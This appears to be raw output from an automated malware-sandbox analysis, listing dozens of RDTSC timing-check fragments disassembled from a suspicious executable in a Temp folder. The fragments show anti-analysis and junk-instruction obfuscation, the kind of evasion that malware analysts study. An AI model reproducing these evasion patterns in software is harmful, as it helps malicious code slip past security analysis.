Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 57528A second address: 57528E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 57528E second address: 57529A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5834D4 second address: 5834D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5834D8 second address: 5834EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop ebx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 58189C second address: 5818A7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5818A7 second address: 5818B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F12E108FDB6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5818B4 second address: 5818C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F12E0FAFC76h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5818C0 second address: 5818E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E108FDBFh 0x00000007 jng 00007F12E108FDB6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 58222B second address: 58222F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 58222F second address: 582233 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 582233 second address: 582255 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F12E0FAFC76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jne 00007F12E0FAFC82h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 59C81A second address: 59C81F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 59ED89 second address: 59ED8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5A5D7B second address: 5A5D7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5A5D7F second address: 5A5E2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F12E108FDB6h 0x00000009 js 00007F12E108FDB6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push ebx 0x00000016 call 00007F12E108FDB8h 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], ebx 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc ebx 0x00000029 push ebx 0x0000002a ret 0x0000002b pop ebx 0x0000002c ret 0x0000002d pushad 0x0000002e mov edx, dword ptr [ebp+122D1E21h] 0x00000034 jmp 00007F12E108FDC3h 0x00000039 popad 0x0000003a push dword ptr fs:[00000000h] 0x00000041 sub dword ptr [ebp+122D31E3h], esi 0x00000047 mov dword ptr fs:[00000000h], esp 0x0000004e mov ebx, dword ptr [ebp+122D1B9Bh] 0x00000054 mov eax, dword ptr [ebp+122D00DDh] 0x0000005a sbb ebx, 01E1A76Fh 0x00000060 push FFFFFFFFh 0x00000062 push 00000000h 0x00000064 push edi 0x00000065 call 00007F12E108FDB8h 0x0000006a pop edi 0x0000006b mov dword ptr [esp+04h], edi 0x0000006f add dword ptr [esp+04h], 00000016h 0x00000077 inc edi 0x00000078 push edi 0x00000079 ret 0x0000007a pop edi 0x0000007b ret 0x0000007c jmp 00007F12E108FDBCh 0x00000081 push eax 0x00000082 push eax 0x00000083 push edx 0x00000084 jl 00007F12E108FDB8h 0x0000008a pushad 0x0000008b popad 0x0000008c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5A9C1F second address: 5A9C24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5A6CC4 second address: 5A6CCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5AF165 second address: 5AF16E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5AF16E second address: 5AF172 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5AF172 second address: 5AF193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007F12E0FAFC85h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5AF193 second address: 5AF19D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5C7A91 second address: 5C7AAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F12E0FAFC88h 0x0000000c jmp 00007F12E0FAFC82h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5C7AAF second address: 5C7AB4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5C7AB4 second address: 5C7ABC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5C7C22 second address: 5C7C28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 577483 second address: 5774A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E0FAFC7Ch 0x00000007 jo 00007F12E0FAFC78h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 js 00007F12E0FAFC76h 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5774A6 second address: 5774BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F12E108FDBEh 0x0000000e pushad 0x0000000f popad 0x00000010 je 00007F12E108FDB6h 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5774BF second address: 5774C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5C81BE second address: 5C81F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F12E108FDBCh 0x0000000b jns 00007F12E108FDB6h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F12E108FDC7h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5C81F0 second address: 5C822A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F12E0FAFC89h 0x0000000b pushad 0x0000000c jmp 00007F12E0FAFC88h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5CBBA2 second address: 5CBBA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5CBBA6 second address: 5CBBAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5CBBAE second address: 5CBBB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5CBBB3 second address: 5CBBC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007F12E0FAFC76h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5D2FDB second address: 5D2FF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F12E108FDB6h 0x0000000a jmp 00007F12E108FDBEh 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5D2FF4 second address: 5D2FF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5D2FF9 second address: 5D3001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5D3001 second address: 5D3022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F12E0FAFC84h 0x0000000c jno 00007F12E0FAFC76h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5D2BBA second address: 5D2BC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F12E108FDB6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5D2BC4 second address: 5D2BC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5D3ABC second address: 5D3AC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5944BB second address: 5944C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5944C1 second address: 5944C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5944C5 second address: 57689A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 js 00007F12E0FAFC7Eh 0x0000000f jp 00007F12E0FAFC78h 0x00000015 nop 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007F12E0FAFC78h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 0000001Ch 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 jbe 00007F12E0FAFC7Bh 0x00000036 mov edi, 71398A3Ah 0x0000003b sub dword ptr [ebp+122D2756h], esi 0x00000041 lea eax, dword ptr [ebp+12489249h] 0x00000047 movzx edi, bx 0x0000004a nop 0x0000004b jns 00007F12E0FAFC7Eh 0x00000051 push eax 0x00000052 pushad 0x00000053 jmp 00007F12E0FAFC7Fh 0x00000058 push edi 0x00000059 jc 00007F12E0FAFC76h 0x0000005f pop edi 0x00000060 popad 0x00000061 nop 0x00000062 mov ecx, dword ptr [ebp+122D1C52h] 0x00000068 call dword ptr [ebp+122D1B6Bh] 0x0000006e push ebx 0x0000006f pushad 0x00000070 jns 00007F12E0FAFC76h 0x00000076 pushad 0x00000077 popad 0x00000078 jmp 00007F12E0FAFC7Bh 0x0000007d popad 0x0000007e push ebx 0x0000007f push eax 0x00000080 push edx 0x00000081 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5945CD second address: 5945D7 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F12E108FDBCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 595291 second address: 595295 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 595295 second address: 59529B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 59529B second address: 5952B4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F12E0FAFC78h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 jbe 00007F12E0FAFC76h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 59553A second address: 59558E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F12E108FDB8h 0x0000000c push edx 0x0000000d pop edx 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 pushad 0x00000013 popad 0x00000014 pop eax 0x00000015 pushad 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b popad 0x0000001c mov eax, dword ptr [esp+04h] 0x00000020 jmp 00007F12E108FDC2h 0x00000025 mov eax, dword ptr [eax] 0x00000027 jmp 00007F12E108FDBAh 0x0000002c mov dword ptr [esp+04h], eax 0x00000030 pushad 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F12E108FDBFh 0x00000038 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 59565E second address: 5956B6 instructions: 0x00000000 rdtsc 0x00000002 js 00007F12E0FAFC76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b add edi, 066802FBh 0x00000011 mov dword ptr [ebp+12483F1Ah], edx 0x00000017 lea eax, dword ptr [ebp+1248928Dh] 0x0000001d push 00000000h 0x0000001f push esi 0x00000020 call 00007F12E0FAFC78h 0x00000025 pop esi 0x00000026 mov dword ptr [esp+04h], esi 0x0000002a add dword ptr [esp+04h], 0000001Ch 0x00000032 inc esi 0x00000033 push esi 0x00000034 ret 0x00000035 pop esi 0x00000036 ret 0x00000037 jmp 00007F12E0FAFC80h 0x0000003c nop 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 push ebx 0x00000042 pop ebx 0x00000043 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5956B6 second address: 5956C0 instructions: 0x00000000 rdtsc 0x00000002 js 00007F12E108FDB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5956C0 second address: 5956CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F12E0FAFC76h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5956CA second address: 5956DC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F12E108FDB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5956DC second address: 5956E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5956E0 second address: 577483 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007F12E108FDB8h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000016h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 lea eax, dword ptr [ebp+12489249h] 0x00000028 push 00000000h 0x0000002a push edi 0x0000002b call 00007F12E108FDB8h 0x00000030 pop edi 0x00000031 mov dword ptr [esp+04h], edi 0x00000035 add dword ptr [esp+04h], 00000015h 0x0000003d inc edi 0x0000003e push edi 0x0000003f ret 0x00000040 pop edi 0x00000041 ret 0x00000042 or dword ptr [ebp+12469D19h], edx 0x00000048 push eax 0x00000049 jnl 00007F12E108FDCDh 0x0000004f mov dword ptr [esp], eax 0x00000052 call dword ptr [ebp+122D215Ch] 0x00000058 push eax 0x00000059 push edx 0x0000005a push ecx 0x0000005b push edx 0x0000005c pop edx 0x0000005d jmp 00007F12E108FDC6h 0x00000062 pop ecx 0x00000063 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5D85A7 second address: 5D85AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5DCF60 second address: 5DCF6A instructions: 0x00000000 rdtsc 0x00000002 js 00007F12E108FDB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5DCF6A second address: 5DCF88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 jmp 00007F12E0FAFC84h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5DCF88 second address: 5DCFA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 jmp 00007F12E108FDC1h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5508CE second address: 5508E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F12E0FAFC7Bh 0x00000009 jmp 00007F12E0FAFC7Ch 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5DCB10 second address: 5DCB18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5E30CD second address: 5E30DE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop esi 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jno 00007F12E0FAFC76h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5E29BD second address: 5E29CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E108FDBAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5E29CB second address: 5E29E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F12E0FAFC86h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5E2DF1 second address: 5E2E0D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F12E108FDC2h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5E2E0D second address: 5E2E32 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 js 00007F12E0FAFC76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F12E0FAFC89h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5E7FB8 second address: 5E7FBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5E7FBE second address: 5E7FC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5E7FC2 second address: 5E7FC8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5E7FC8 second address: 5E7FD1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5E7FD1 second address: 5E8001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F12E108FDBEh 0x0000000e jmp 00007F12E108FDC9h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5E73A0 second address: 5E73A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5E73A8 second address: 5E73D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F12E108FDC0h 0x00000009 jmp 00007F12E108FDC5h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5E76DD second address: 5E76E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5E76E3 second address: 5E76E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5E76E7 second address: 5E76F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F12E0FAFC76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
